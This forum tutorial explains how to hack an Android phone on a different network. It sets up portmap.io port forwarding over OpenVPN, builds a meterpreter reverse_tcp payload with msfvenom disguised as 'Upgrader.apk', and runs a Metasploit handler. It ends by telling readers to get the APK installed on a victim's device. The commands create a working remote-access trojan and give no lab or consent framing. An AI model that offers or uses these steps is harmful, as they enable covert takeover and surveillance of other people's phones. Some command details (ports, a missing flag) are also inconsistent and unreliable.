HACK ANDROID with KALI USING PORT FORWARDING(portmap.io)

Oct 14, 2019 04:41 PM
637065285851845451.jpg

Yo fellas! This is my first null byte writing,so any errors or mistakes regarding post are welcome.

I have seen in the post of HOW TO HACK ANDROID WITH KALI. But many people are facing problems on hacking the android which is not on the same network as of that of the attacker. So today i am gonna show you how to hack android with port forwarding with portmap.io. So lets get rollin'!!!

Step 1: Create Account in portmap.io

First thing you want to dive in is create account. Go to portmap.io and sign up

637065285851845451.jpg

Click on register and you will get a verification link. Click on it and you created the account.

Step 2: Create Configurations

637065287790752614.jpg

Now you will have an interface like this. Click on the configurations and then click on create new configurations.

637065288990752089.jpg

Now, first will come name. Give any name you like. Then comes the type so we will chose OpenVpn(preinstalled in kali). Then atlast comes protocol,select TCP. Leave the comment box empty.

Then atlast you need to click on generate and you will have something like the above screen. Download and save the file. Also take a note of the commands that are written. For me its "openvpn --config hello1234.hello.ovpn". Dont forget to click on create at the end xD.

Then download the file and copy it to the desktop.

Step 3: Create Mapping Rules

Now go to mapping rules and create new rule

637065293125439330.jpg

Just you need to write "4444" in port on pc. Its usually same in all pc. Click on create.

637065294301220567.jpg

So we created our rule. We are almost done.

Step 4: Create Payload with Metasploit

Most of you would know how to create payload but just there are slight changes. You have to change the lhost and also the lport. So your lhost will be "hello1234-58334.portmap.host" and your lport will be "58334".

msfvenom android/meterpreter/reverse_tcp LHOST=hello1234-58334.portmap.host LPORT=58334 R -o /root/Upgrader.apk

Step 5: Start the Port Forwarding

Now you need to start the port forwarding. Its damn easy, just copy the command then paste in terminal.

While making the configuration we had downloaded the config., so go to desktop and then run "openvpn --config hello1234.hello.ovpn". See the command will be different for you so dont ctrl+c and ctrl+v. Check the command then run it.

637066420308564327.jpg

PS: I had to make a new portmap.io account because of some issues. Hope you guys dont mind :D

Step 6: Ready to Exploit

This will be the final stage i think. Now follow me:

*use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost hello1234-58334.portmap.host

set lport 4444

set ExitOnSession

exploit*

637066426469658290.jpg

Thats it. Now you have to install it in victim's device and boom!!

You hacked him out of the network.

Any problems are welcome in comment section :)

Comments

No Comments Exist

Be the first, drop a comment!